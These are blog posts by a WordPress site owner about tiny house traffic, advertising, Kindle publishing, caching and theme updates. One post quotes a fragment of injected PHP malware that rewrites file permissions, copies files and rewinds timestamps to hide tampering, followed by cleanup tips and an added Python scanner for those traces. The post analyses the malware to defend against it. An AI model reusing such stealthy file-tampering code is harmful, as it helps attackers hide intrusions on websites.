Dang it! – JohnnyA got me again
This time he hit two of my minor blogs, that I didn’t harden as well as my big blogs. My bigger problem is that I don’t know how he got back in. I cracked his code and read through it carefully but still don’t know what it does entirely.
There are some troubling lines of code though. For example, these few lines change file permissions and edit files for immediate or later code insertions. He’s using 0644 and not 777, which would make files wide open to public read/write/execute, and that is even more curious.
if (!is_writable($b6)) @chmod($b6, 0644);
$b8 = @filemtime($b6);
@copy($a6,$a6.'1.php');
@touch($b6,$b8,$b8);
@touch($a6.'1.php',$b8,$b8);
$d0 = rand_checkstr();
$e1 = array("((^index.*\.|^default.*\.|^main.*\.|^.*body.*\.|^login.*\.|^.*content.*\….
My guess is that his code infiltrates and copies itself or inserts more malware into existing files using normal hooks (like </body>, </head>, and </html>). This is normal stuff… but then it lies dormant until he runs another script that uses cross-site scripting. I suspect this is a classic Trojan script written in PHP, although I’m not a hacker so how would I know.
So it’s incredibly important to run some scans through your database: use phpMyAdmin and search for eval( and $0=. Just be careful not to delete your whole database. That’s really easy to do if you’re not familiar with using phpMyAdmin.
It might also be good to replace all your plugins and WordPress core files with fresh copies. Also be on the lookout for new files his script might have created as future-use backdoors. I’ve not found any of these yet but he seems like a really tricky bastard and that would be an obvious feature to add to his script.
Also be sure to change your blog and FTP passwords. I don’t think it’s unthinkable that JohnnyA has found a way to crack the WP password hash. This would be very difficult to do but he’s gotten so deep into my blogs’ core code that I think it’s good prevention to change your password.
Also check the file permission on your files via FTP and triple check your .htaccess file. I use WP-Super-Cache to rewrite the .htaccess file and help speed up performance.
There are some other plugins you can install, like Exploit Scanner, which seem to help you explore vulnerabilities. But I’ve not found any tool that works perfectly to block this JohnnyA.
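An added example, not part of the original post or of any plugin named in it: a file-side check for the three traces the quoted snippet leaves (a modification time rewound with touch(), a "<name>1.php" copy beside the original, and the eval( / $0= strings). The names scan_tree and build_demo_tree are hypothetical, the sample tree is constructed, and a POSIX filesystem is assumed, where touch() cannot rewind the inode change time.

```python
import os
import re
import shutil
import tempfile

# Strings the post says to search for, applied here to files instead of the DB.
SUSPECT = re.compile(rb"eval\s*\(|\$0\s*=")

def scan_tree(root, skew=3600):
    """Return sorted (relative_path, reason) pairs for suspicious files (POSIX)."""
    findings = set()
    for folder, _dirs, files in os.walk(root):
        names = set(files)
        for name in files:
            path = os.path.join(folder, name)
            rel = os.path.relpath(path, root)
            st = os.stat(path)
            # touch() can rewind mtime but not ctime, so a large gap is a hint
            # (a chmod or a restore from backup produces the same gap).
            if st.st_ctime - st.st_mtime > skew:
                findings.add((rel, "mtime-rewound"))
            # copy($a6, $a6.'1.php') leaves "<original>1.php" beside the original.
            if name.endswith("1.php") and name[:-5] in names:
                findings.add((rel, "copy-of-sibling"))
            if name.endswith(".php"):
                with open(path, "rb") as fh:
                    if SUSPECT.search(fh.read()):
                        findings.add((rel, "suspect-string"))
    return sorted(findings)

def build_demo_tree(root):
    """Constructed sample: one clean file, one file altered the way the snippet does."""
    with open(os.path.join(root, "clean.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>")
    target = os.path.join(root, "index.php")
    with open(target, "w") as fh:
        fh.write("<?php eval($payload); ?>")  # harmless placeholder text
    old = os.stat(target).st_mtime - 10 * 86400
    shutil.copy(target, target + "1.php")
    os.utime(target, (old, old))              # same effect as @touch($b6,$b8,$b8)
    os.utime(target + "1.php", (old, old))

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as demo:
        build_demo_tree(demo)
        for rel, reason in scan_tree(demo):
            print(f"{reason:16} {rel}")
```

Treat every hit as a lead to compare against a fresh copy of WordPress core or the plugin, since legitimate code also calls eval( and backups also preserve old modification times.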
50,613 Absolute Unique Visitors Today on Tiny House Design
What an amazing day on Tiny House Design today. Jay Shafer and his tiny house were featured on the Yahoo homepage and we got thousands of new visitors to our tiny house blogs. I had a record day eclipsing my previous record by a factor of five. I typically get about 50,000 unique visitors on Tiny House Design each month, so to get that much traffic in ONE DAY is really incredible.
My inbox is still crammed full of questions from new readers. The most common questions are:
- Where can a tiny house be parked?
- How much do they cost?
- How do I get started building one?
I’ll do some writing on these topics in the coming week to see if I can help shed some light on these popular topics.
Big thanks to Yahoo. It’s really wonderful to see this very important alternative housing topic covered so prominently. I also want to sincerely thank my friends Jay Shafer, and Steve Weissman over at the Tumbleweed Tiny House Company!
The Trouble with Monetizing a Green Blog with Advertising in Pale Shades of Green
One of the main methods green bloggers use to support themselves financially with their blogs is by working with advertising networks that sell ad space for them. Google AdSense is often the first choice by bloggers because their solution is so easy to implement. Virtually any blogger can sign up and start earning money right away, including those with low traffic blogs. Google also does a reasonably good job of targeting relevant ads to the website content too. This is good for the advertiser, blogger, and reader because it keeps the paid content in context and improves the effectiveness of the advertising as well as the user experience.
Once a blog’s traffic increases to a certain level it becomes eligible for ad networks that pay per impression instead of per click like Google. Google limits you to three ad units per page. The benefit of adding another ad network is that you can theoretically double your ad revenue by doubling the number of ads on the page, as long as you don’t run into the downside of the law of diminishing returns by filling the page with ads.
I was running 7 ad spaces on TinyHouseDesign.com until today, but finally became dissatisfied with the pale green ads my second ad network was delivering. I also became very dissatisfied with their management when my sell-through rate dropped dramatically without any satisfactory explanation. I’ll keep one ad unit running in a prominent spot for a few months to see if this is just a temporary issue.
Catch-22 for Ad Networks
You see, I think the main problem is that most of the advertising dollars out there right now are coming from large corporations that typically focus on green-washing campaigns more than truly green endeavors. So ad networks are probably caught in a catch-22 just like most small businesses in America. They can either cling to their ethics and face ruin or accept a wider variety of advertising deals and survive.
Catch-22 for Bloggers
Green bloggers who rely on advertising revenue as their main source of income are also stuck in a hard spot. They can either choose to struggle and cut out these pale green ads or buck it up and let them continue running.
Thank God for Day Jobs & Multiple Income Streams
Luckily for me I have a good day job. So instead of continuing to let these pale green ads run on TinyHouseDesign.com, I’ll refocus my attention on monetizing my site in other ways, like drawing more tiny house plans.
Basic Simplicity Theme version 1.4.1
This past week I finished an update to Basic Simplicity. I also launched a new blog dedicated to the theme to help focus on theme content. I’ll also be writing about my adventures in problogging with an emphasis on avoiding all the deep bullshit you’ll read about making money.
Don’t get me wrong, you can make money blogging, but it seems most of the probloggers are so focused on selling the idea of blogging to schemers that they often sound like schemers themselves with all their ebooks, mentorships, and classes. I have no plans to ‘make money’ writing about blogging; I’ll stick to selling something of real value, tiny house plans. So in other words… what I’ll have to say about blogging will be free.
So if you want a slightly different tone I hope you’ll follow me at BasicSimplicity.com. I also set up a Twitter account specifically for Basic Simplicity theme and blogging tweets @basicsimplicity.
How to publish your blog on the Amazon Kindle
I just finished submitting two of my busiest blogs to be published on the Amazon Kindle. It was really easy to do but there is no guarantee they will approve it. I’ll post here again and report back later on whether my blogs were approved or rejected. But in the meantime let me explain why and how to publish your blog(s) on Kindle.
Overview
What’s a Kindle? Amazon has developed an electronic tablet for reading electronic books.
A blog on Kindle? Amazon has opened Kindle up for reading blogs just like you would read an electronic book. Subscribers pay a monthly subscription fee to Amazon.
Why is there a subscription fee? There is no option to deliver the blog free on Kindle at this time. I guess Amazon is thinking that a small subscription fee is worth the convenience of reading blogs on Kindle.
Do I get paid? Blog publishers get 30% of the monthly subscription fee. The subscription rate pricing is determined by Amazon.
How To
Step 1. Create an Account: (Create your Kindle Publishing Account) You’ll need to provide your tax identification number (like Social Security Number), address, and answers to security questions like your mother’s maiden name, and other information just like you would for any affiliate account. This is not the same as your Amazon Associates account.
Step 2. Add a Blog: You’ll need to prepare the following graphic images and information before you’ll be able to complete their submission form:
Screenshot: This image must be 800×600 pixels or smaller and less than 1.0 MB. You must use GIF, JPEG, TIFF, or BMP.
Masthead: This image must be 430×50 pixels or smaller and less than 1.0 MB. You must use GIF, JPEG, TIFF, or BMP.
Blog Description: Write a concise description of your blog that surfaces the most popular features of your blog. I always refer to my Google Analytics account when trying to understand the most popular content on my blogs.
Keywords/Tags: They allow 128 characters worth of keywords/tags. Be sure to choose wisely because these are used when people search for Kindle content.
RSS Feed URL: I submitted my original WordPress generated RSS URL. I didn’t want my Kindle account to rely on my Feedburner RSS URL. If you don’t know what your RSS URL is just view source and look for a line of code that looks like this:
<link rel="alternate" type="application/rss+xml" title="Tiny House Design RSS Feed" href="http://www.tinyhousedesign.com/feed/" />
The RSS URL in this example is: http://www.tinyhousedesign.com/feed/
Submission Form: Here is a screenshot of their submission form. Just click the thumbnail to see the full size image.
Step 3. Wait for Approval: It takes up to 72 hours for Amazon to approve or reject your submission.
Conclusion
This seems like a really interesting way to monetize and promote a blog. I think it’s still too early to know if Kindle will be a big hit like the iPhone but it does make sense to jump in early and get your blog on Kindle. It takes little time and costs no money and has great potential.
The newest Kindle seems like a really nifty device. I like it mostly because it would make it easy to downsize the bulk of a library and reduce the number of possessions we own. As a simple living advocate and anti-consumerist it’s a little ironic that I’d actually see value in any consumer product but this one would actually reduce the books you have to store.
Create your Kindle Publishing Account
Update! Both blogs I submitted were approved and are now available on Amazon Kindle. Take a look:
WP Super Cache Lowers My Hosting Cost
A couple of weeks ago I began re-testing a popular WordPress plugin called WP Super Cache. I had tried it before but had installed it incorrectly and crashed my biggest blog. This time I installed it right and it works great. It works by making flat HTML files of your blog’s web pages and moves the traffic load to Apache (the web server software) and off MySQL (the database software).
The benefit of this is that Apache can take the load and MySQL burns up the server’s processor, relatively speaking. My host, Media Temple, charges more money when you use more than your fair share of your shared server’s processor. This seems fair and I like Media Temple because their system can auto scale-up to take huge traffic days, and I’ve had several on Tiny House Design.
My testing has shown that WP Super Cache does reduce my cost because it lightens the load on MySQL. It also speeds up my page loads because Apache is incredibly efficient at serving up flat HTML pages and images.
So I highly recommend WP Super Cache but will also warn you to be sure to read all the installation documentation and learn how to back it out if you experience a crash.
Here are screenshots from my GPU usage (processor use) at Media Temple and Google Analytics during the same time period. As you can see traffic was flat and GPU usage remained low.
Above: Control panel on Media Temple that shows low GPU usage.
Below: Report on Google Analytics.
Basic Simplicity 1.3 (new version of my WordPress theme)
I submitted my minimalist WordPress theme to the Free Theme Directory the other day and got a note back from them with a few suggestions. It didn’t take long to implement their recommended improvements and now Basic Simplicity 1.3 is available.
Updated WordPress Theme – Basic Simplicity Version 1.2
Over the last few nights I whipped up a simple administration screen for my free WordPress Theme. Now you can make very quick style changes right in the WordPress user interface; there’s no need to edit the stylesheet. You can also add your Google Analytics code, Google site verification code, and custom CSS.
These will be the last few edits for a while; I think I have it working well enough to start using basic simplicity on all my blogs. I have a few more features I’d like to add but I’ll hold off and give this version a careful test drive. If you give it a try too and run across any bugs please let me know. If you have any suggestions for future versions I’m all ears as well.
Basic Simplicity WordPress Theme Updates
I just uploaded the next version of basic simplicity, the WordPress theme I created. The biggest changes are the addition of four more widget areas (for a total of 10) to make it easy to add advertising to the top right and bottom of posts and pages.
I also added a mini-stylesheet to the bottom of the main stylesheet. This is bound to cause a little confusion so in the next iteration I’ll create a theme admin screen to allow quick color and style edits right in the WordPress interface.
Complete Redesign Of Tiny House Design User Interface
It’s midnight and I think I’m done reworking the UI of tiny house design. My main concern wasn’t the look & feel but the navigation. One of the biggest problems with a blog, by nature, is its ability to hide away old content. But the beauty of the WordPress CMS (and I think it deserves to be called that) is its flexibility. Anyway take a look.









